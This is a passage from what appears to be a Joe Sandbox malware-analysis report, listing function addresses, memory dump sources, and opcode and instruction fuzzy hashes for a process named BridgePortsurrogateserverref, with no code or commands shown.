                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dbcff9615cc071c48db80530abad2876e60af8b65989f75980fd7737f286b8d8
                                                    • Instruction ID: ad9ffdd2f236c3f6cf090bdd4536694c80ca9d7e589f3836c0666a9eec0a52d5
                                                    • Opcode Fuzzy Hash: dbcff9615cc071c48db80530abad2876e60af8b65989f75980fd7737f286b8d8
                                                    • Instruction Fuzzy Hash: 2871173D50E54ACFF768DB1888565B437D0EF46311F1482BAD19ECB992DE18EA0E87C2
                                                    Function 00007FFAAC98B12D Relevance: .2, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f033a467bd08bd91a3a6ba4aa8809fed83f29836f4f77c39475b8cbfd497a4d
                                                    • Instruction ID: 3380c81975d435699dc394d7e20128abda7c6cc867c99eddf446e48e9d38c516
                                                    • Opcode Fuzzy Hash: 4f033a467bd08bd91a3a6ba4aa8809fed83f29836f4f77c39475b8cbfd497a4d
                                                    • Instruction Fuzzy Hash: A961F67950E4898FF7A8DB188C565BD77C0FF96320B0842B9D09EC75A2DD18EA0E87C1
                                                    Function 00007FFAAC5808D0 Relevance: .2, Instructions: 158COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 09371c95053bfd6cccc382a879d666951913c62f40cde08c021c0f3926b6f724
                                                    • Instruction ID: 829f1051a1c2824506c4a16fedee70e565e8aaa7e80ee6371266f43c4aa60225
                                                    • Opcode Fuzzy Hash: 09371c95053bfd6cccc382a879d666951913c62f40cde08c021c0f3926b6f724
                                                    • Instruction Fuzzy Hash: FE414922A4C6564FE305F77CA0966F97784DF8A325B1485BBE04EC72A7DE18A84583C4
                                                    Function 00007FFAAC98A977 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0d23e66344977e3c682d6973e550e9b579487db710973f6725fd04ce404ac9a2
                                                    • Instruction ID: 43c3536e621fa2f3dff9a70fc80c9ebe43bda3cf00452afefd793c575ebd9a95
                                                    • Opcode Fuzzy Hash: 0d23e66344977e3c682d6973e550e9b579487db710973f6725fd04ce404ac9a2
                                                    • Instruction Fuzzy Hash: 8041613160CA188FDF98EB18C495EB5B7E1FBA932470441A9D00FC3552DF35E959CB81
                                                    Function 00007FFAAC985947 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 43e2b1adbeaa94e64e72d00688f1efd0526b3b204648e29e35d8a93b4d11d361
                                                    • Instruction ID: 9cecc2813c932336506bfb42b4bfe2772d13a552a3cfc5d7b7f03de4863681f4
                                                    • Opcode Fuzzy Hash: 43e2b1adbeaa94e64e72d00688f1efd0526b3b204648e29e35d8a93b4d11d361
                                                    • Instruction Fuzzy Hash: 99415F31A0CA598FEF98EF18C499EB5B7E1FBA93107044179E00EC7696DE35E845CB81
                                                    Function 00007FFAAC981359 Relevance: .1, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f261567df25df4eaa547c6ceecbb8ca8d9d2cb3624ea5dfb04d0fed0e58121f
                                                    • Instruction ID: 26b660782c3b1a2524c05fda556cbb6c7ca50774c95f66499d77cf37ff11bd54
                                                    • Opcode Fuzzy Hash: 5f261567df25df4eaa547c6ceecbb8ca8d9d2cb3624ea5dfb04d0fed0e58121f
                                                    • Instruction Fuzzy Hash: CB31B56AD0E68BCBFB29575498155B93B90EF03B20F18417EE44F874C2DF0CAA5993D2
                                                    Function 00007FFAAC9859F1 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d4a0239bff6f9e99af5b731a7f587a50c4b488af14bbf30066e7bf5edff05a9
                                                    • Instruction ID: d739a7f51af4a0fecd1b03267fdb78101e23e5ce44f8a8ffbb4dff80fe8a98ba
                                                    • Opcode Fuzzy Hash: 2d4a0239bff6f9e99af5b731a7f587a50c4b488af14bbf30066e7bf5edff05a9
                                                    • Instruction Fuzzy Hash: B0316031A08A498FDB98EF28C499EB477E1FBA931070441B9E00EC7192DE34E844CB81
                                                    Function 00007FFAAC98AA21 Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47e797328cd6d0a16c7a9dd51fa7bfe679020716cfe38cddb9592d88d3b79293
                                                    • Instruction ID: aa8c7ee4e870bda68792eb0027487f7649233b77fc0fae367b18c1083621cb9f
                                                    • Opcode Fuzzy Hash: 47e797328cd6d0a16c7a9dd51fa7bfe679020716cfe38cddb9592d88d3b79293
                                                    • Instruction Fuzzy Hash: 7C316D31608A588FDB58EB28C0A5EB4B7E1FBA931570442A9D04FC7592DE35E948CB81
                                                    Function 00007FFAAC98598B Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3562fc34eba01e059b3bfb66d6151234880e16df180b5de5b997bf090c3f3dcc
                                                    • Instruction ID: 971eaf9f6549d84f343ee480f0c2c188420524f85840a3bab2cf322f395870d3
                                                    • Opcode Fuzzy Hash: 3562fc34eba01e059b3bfb66d6151234880e16df180b5de5b997bf090c3f3dcc
                                                    • Instruction Fuzzy Hash: 91317231618A49DFEF98EF28C099EB5B7E1FBA93107044179E00EC7692DE35E845CB81
                                                    Function 00007FFAAC98A9BB Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 82b3890a10ae5f3da53ac6b93f815f8794f41bbbee803481172cc92da9129aa1
                                                    • Instruction ID: 369921628cc468cc739aeac8acff004a28ab6c8585435fdf341edaf9caceaacc
                                                    • Opcode Fuzzy Hash: 82b3890a10ae5f3da53ac6b93f815f8794f41bbbee803481172cc92da9129aa1
                                                    • Instruction Fuzzy Hash: 57317E31608A598FDF98EB28C095EB5B7E1FBA931470441A9D00FC7692DF39E949CB81
                                                    Function 00007FFAAC580960 Relevance: .1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea1d2937b19976a4ccf8f8b9c1a1c8bab653accd5a9fbf4460f5c834bbd09617
                                                    • Instruction ID: c1466b8344764576bfa59cd93ae24b6e9d9ed5d7c1424941152e2eaf96030836
                                                    • Opcode Fuzzy Hash: ea1d2937b19976a4ccf8f8b9c1a1c8bab653accd5a9fbf4460f5c834bbd09617
                                                    • Instruction Fuzzy Hash: 3C31D321A1CA1A4FF648B77CA45AAB963C5DF89325F1584BAE40EC32E7DD28EC4143C4
                                                    Function 00007FFAAC9811E1 Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6928ae50028893a9161f208e91f5b87b4aa3130d9c1b41e4d55361956b280ec9
                                                    • Instruction ID: 66b35c9421a056c831c0427d91f106c7fd118cae3d0bed6bdbcac83e8d0c3208
                                                    • Opcode Fuzzy Hash: 6928ae50028893a9161f208e91f5b87b4aa3130d9c1b41e4d55361956b280ec9
                                                    • Instruction Fuzzy Hash: DE316D7491D68EDFEB45DB68C8505BC7BB1FF5A300F4441BAD04EE7292CB28A909C791
                                                    Function 00007FFAAC985755 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3da238601706099573add9f9f10715a5e12ea734c18764089e34d5afb0057056
                                                    • Instruction ID: 413d86a4e6af9e7eca65096f10fd26909f264d2662d54cdbaaa1fc459306ad15
                                                    • Opcode Fuzzy Hash: 3da238601706099573add9f9f10715a5e12ea734c18764089e34d5afb0057056
                                                    • Instruction Fuzzy Hash: 1131053491A94ACFFF98EF5484555BD77B1FF46700F9080BAD40ED3581DB38AA488B81
                                                    Function 00007FFAAC98A785 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d97b9b937c4710d42d81cac16a3662f8f12430d92532800a6bd8c2a368a92224
                                                    • Instruction ID: 46fb4ed56a72c3b228f4dd045eb772b28b25e439d6dc45bdf447bbfbed94048f
                                                    • Opcode Fuzzy Hash: d97b9b937c4710d42d81cac16a3662f8f12430d92532800a6bd8c2a368a92224
                                                    • Instruction Fuzzy Hash: 57313735D1A94ACEFBA8DB5484515FD77B0FF45300F9080BAD40EE7181DE38AA4A9791
                                                    Function 00007FFAAC580998 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 967d645c2c924513bf392885f59c32499611d7fafb850fbc54e5c4d490ff026d
                                                    • Instruction ID: 74a5851c640c52037b82542c12ccad2aef5585b441f7403fff97bc183b047e98
                                                    • Opcode Fuzzy Hash: 967d645c2c924513bf392885f59c32499611d7fafb850fbc54e5c4d490ff026d
                                                    • Instruction Fuzzy Hash: 4A21F520B18A1A4FF788F72C944AA7572CAEBD9325F5040B9F40EC32D7DD28EC414784
                                                    Function 00007FFAAC989670 Relevance: .1, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 247983453163a45f16cdeb070a5db15b4369f902a6c236fd2dfe4193e801d858
                                                    • Instruction ID: 9a3c3da6738f264433bb1d336346459c4dc6b6e4b910e9b9bbe28eb59b5d5a99
                                                    • Opcode Fuzzy Hash: 247983453163a45f16cdeb070a5db15b4369f902a6c236fd2dfe4193e801d858
                                                    • Instruction Fuzzy Hash: 82315510A1D196CBFB69871858615B47B51EB8730171986FAD09F8F0CBD91CEA8DC3C0
                                                    Function 00007FFAAC980140 Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4de707892c7344363a394b7622e83fcccd55b2730b468d9c35ae214e6095853c
                                                    • Instruction ID: 171c006355d5d33c29bda23cb5123ced44ae371838576ce8becee501be0b8f17
                                                    • Opcode Fuzzy Hash: 4de707892c7344363a394b7622e83fcccd55b2730b468d9c35ae214e6095853c
                                                    • Instruction Fuzzy Hash: 7531363491A90ECAFBA8DB9484515BD77B0FF4A300F60917AD00ED3194DB39FA488B81
                                                    Function 00007FFAAC98E550 Relevance: .1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 372fb2d7710136143fa7f99b66c1fa99407795589d43d56c187616ba449cf08f
                                                    • Instruction ID: 5db7c518dcb73a3070c715c32aa14ab9106ad2d2fa6bbe98e2bbb11b4d769ce2
                                                    • Opcode Fuzzy Hash: 372fb2d7710136143fa7f99b66c1fa99407795589d43d56c187616ba449cf08f
                                                    • Instruction Fuzzy Hash: 6031051891D5DACAF72A831484745B4BB61EF83301B1886FAD0AF8B4DBD91CEA498391
                                                    Function 00007FFAAC984641 Relevance: .1, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9ad823bc56b644617540ba4a7c6123e47a550e9e84802ffc54586dae921edcb
                                                    • Instruction ID: 3d2ffda61753c61b3aae2138237ed7851c461863a49ae3c4136aff758fd8d33b
                                                    • Opcode Fuzzy Hash: f9ad823bc56b644617540ba4a7c6123e47a550e9e84802ffc54586dae921edcb
                                                    • Instruction Fuzzy Hash: 2031291491E5A6CBFB29973854745B47B51EF93301B1886B6D08FCB48BDC2CE949C7C1
                                                    Function 00007FFAAC982543 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7f7cd4b35a04d79cd36bdfffea9204db24d35ecb97473a37d919ae36cf6766fb
                                                    • Instruction ID: ae4e2aa2497251f033d2236ce575870767b756f32c6a4b5cca50786c1a939d22
                                                    • Opcode Fuzzy Hash: 7f7cd4b35a04d79cd36bdfffea9204db24d35ecb97473a37d919ae36cf6766fb
                                                    • Instruction Fuzzy Hash: E221C235A1DA09CFEB98EB28D855A7873E1FF9A311F4040BED04EC3592CE25ED458B90
                                                    Function 00007FFAAC580C25 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1700711479.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac580000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 732def2621034d8b317a043857af8f5efdbf65ebd45767d77b60b6d8371f297e
                                                    • Instruction ID: a6ade30f24b3a50d582bc96b93e4883ea871c628a6d4b4af3e287ce19b385fce
                                                    • Opcode Fuzzy Hash: 732def2621034d8b317a043857af8f5efdbf65ebd45767d77b60b6d8371f297e
                                                    • Instruction Fuzzy Hash: DA21F776A4D10BCAF711BB78D4121FDB7A0EF92325F14C572E00D86192DE38A64A97C1
                                                    Function 00007FFAAC98AE08 Relevance: .1, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d2a3c8e30922986264adeeed2fbd4a41a684ea7228bbb633661dc3d7097120d
                                                    • Instruction ID: 7f886f92d023dd98f37345b5a6b732832ba39d44647e3bc9f577e392b04862ca
                                                    • Opcode Fuzzy Hash: 7d2a3c8e30922986264adeeed2fbd4a41a684ea7228bbb633661dc3d7097120d
                                                    • Instruction Fuzzy Hash: 10216D34D19A4ECFEB94DB58D8905FDB7B1FF99310F00457AD00EE3292DE24A9098B90
                                                    Function 00007FFAAC985F48 Relevance: .1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c691d90c0c8e23044821123c89bd0aa122bfec63a10245d2643df59495dc4696
                                                    • Instruction ID: c520b4774740c3f9c175a0052f9ad7d1ad37db9c2559ebf1194310273b67263b
                                                    • Opcode Fuzzy Hash: c691d90c0c8e23044821123c89bd0aa122bfec63a10245d2643df59495dc4696
                                                    • Instruction Fuzzy Hash: BD212834919A4ECFEF44DF98D850ABCBBB1FF49300F104179E00EE3291DA24A9198B91
                                                    Function 00007FFAAC98173A Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e026c7a6a4a65675406fe3153f52545b732dd54bdba3cfbc75d0da7c4a8b8ce4
                                                    • Instruction ID: fd032b60e8c6342afcb375e42be43eaeff01d5f49fee5fa2ac6e7ccb01544f23
                                                    • Opcode Fuzzy Hash: e026c7a6a4a65675406fe3153f52545b732dd54bdba3cfbc75d0da7c4a8b8ce4
                                                    • Instruction Fuzzy Hash: DA21C25580F2C6CBFB2A436458246B96F905F43A20F1C81BEE04E8B4C3DE4C9A8993C2
                                                    Function 00007FFAAC9825A7 Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d042025aef41b5e1e1dc838b015bfd60c4433296382cbaff2621014603233d4
                                                    • Instruction ID: 28adc4e4c916cd03e2f17b04d0638ae2d21a414efb7f2654682dba21738ee07d
                                                    • Opcode Fuzzy Hash: 3d042025aef41b5e1e1dc838b015bfd60c4433296382cbaff2621014603233d4
                                                    • Instruction Fuzzy Hash: 5A113331608A188FDB98EB28D895AA9B7F2FF59311F1041AFD04ED7662CE31AC45CB40
                                                    Function 00007FFAAC98871C Relevance: .1, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d466205ddc03d98eb32a5f9e1f2ab256f296fa4ed12942aac55f2ba66d55f10
                                                    • Instruction ID: 0646dd5ede7e3b2c1720a39aa3c64ec819de50919bcd4436b19051b1c029e4f9
                                                    • Opcode Fuzzy Hash: 3d466205ddc03d98eb32a5f9e1f2ab256f296fa4ed12942aac55f2ba66d55f10
                                                    • Instruction Fuzzy Hash: CB115935A5E98A8EFB19B73098018F977E0EF82251B40857BE04EC74C3CE2DA50D83A1
                                                    Function 00007FFAAC980178 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da12ebf36c5c4cc1993da4e7436ec0c3ec3a2943e8600b3e83a0732a0f69d8fb
                                                    • Instruction ID: c67def8d99bac7dc12dc72944c81ff23cf50a54148f2933e4585b012eeb6f6e8
                                                    • Opcode Fuzzy Hash: da12ebf36c5c4cc1993da4e7436ec0c3ec3a2943e8600b3e83a0732a0f69d8fb
                                                    • Instruction Fuzzy Hash: 4F21CC1891D46FCAF629931484705B5B751EF92305B14C5F9E06F8B4CADD1CFE8593C0
                                                    Function 00007FFAAC982BCB Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71a6b8ee238e14039cc82b5bbc22a32d5daee41f8a43ecc4448ae9f71674f445
                                                    • Instruction ID: ded874a712cae61280ff455b4f24debeb60dc8a297c3e87b7fcc724e2bf22c0f
                                                    • Opcode Fuzzy Hash: 71a6b8ee238e14039cc82b5bbc22a32d5daee41f8a43ecc4448ae9f71674f445
                                                    • Instruction Fuzzy Hash: 9011D375D0AA498FFB48FB6498566FCBBA0FF1A311F4441BAD00ED3183DE2998468780
                                                    Function 00007FFAAC987A39 Relevance: .1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 22ed6c60d97cd671aa094c0e5a4b3fb62f7bc61b4bd9f46071dc6a33d59dfee5
                                                    • Instruction ID: d8d815e0edc379dd2c562e9877fec165e127761330ee0997b8ab63194d0b598f
                                                    • Opcode Fuzzy Hash: 22ed6c60d97cd671aa094c0e5a4b3fb62f7bc61b4bd9f46071dc6a33d59dfee5
                                                    • Instruction Fuzzy Hash: 5E11D03590E68ADFF321976448546F93FA6DF5B340F048076F00ED7292DE6DAA4D83A1
                                                    Function 00007FFAAC982A09 Relevance: .1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f88a733a1848ea621281fc082c9e5c05a7b56d99e13e10563b1e5cdde4f2f3d9
                                                    • Instruction ID: 91437e0a433e9490c5756283e0589019574cc43e4c5e8cca56463808d98bb2c8
                                                    • Opcode Fuzzy Hash: f88a733a1848ea621281fc082c9e5c05a7b56d99e13e10563b1e5cdde4f2f3d9
                                                    • Instruction Fuzzy Hash: 6F112735D0EB8A8FF725976088546B93BA4EF6B340F054076E00ED71C1DA68A94AC3D1
                                                    Function 00007FFAAC984670 Relevance: .1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.1869982607.00007FFAAC980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC980000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_10_2_7ffaac980000_BridgePortsurrogateserverref.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3bc4961eb1d17ae9e3dfce708c676dbdba8883fe9925d88a04210ad073c1bd72
                                                    • Instruction ID: ef5afd33fb791f2696bac365da39c4e3afebf231a1049713b6e546be527587d5
                                                    • Opcode Fuzzy Hash: 3bc4961eb1d17ae9e3dfce708c676dbdba8883fe9925d88a04210ad073c1bd72
                                                    • Instruction Fuzzy Hash: A511E71492E47ACAFA389B2894745B57751FF92302B24C675D08F8B48EDC2CFA859BC1
